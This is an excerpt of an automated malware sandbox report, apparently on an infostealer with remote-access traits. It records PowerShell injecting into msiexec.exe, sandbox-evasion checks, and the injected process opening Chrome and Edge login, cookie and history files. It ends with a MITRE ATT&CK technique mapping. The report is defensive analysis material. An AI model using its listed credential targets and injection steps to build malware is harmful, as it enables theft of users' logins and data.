Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: msiexec.exe, 00000009.00000002.2667049605.0000000024419000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | API call chain: ExitProcess graph end node | graph_0-3268
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | API call chain: ExitProcess graph end node | graph_0-3273
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04DC77F9 LdrInitializeThunk, | 2_2_04DC77F9
Source: C:\Users\user\Desktop\HVSU7GbA5N.exe | Code function: 0_2_00405EE8 GetModuleHandleA,LoadLibraryA,GetProcAddress, | 0_2_00405EE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HVSU7GbA5N.exeCode function: 0_2_00405BDF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405BDF

          Stealing of Sensitive Information

          Source: Yara match, File source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 3504, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\msiexec.exe  File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 3504, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match, File source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 3504, type: MEMORYSTR
          MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count shown next to the technique in the report; techniques without a number were not matched):

          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Windows Management Instrumentation (1); Native API (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers
          Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
          Privilege Escalation: DLL Side-Loading (1); Process Injection (311); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
          Defense Evasion: Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Process Injection (311); Compile After Delivery
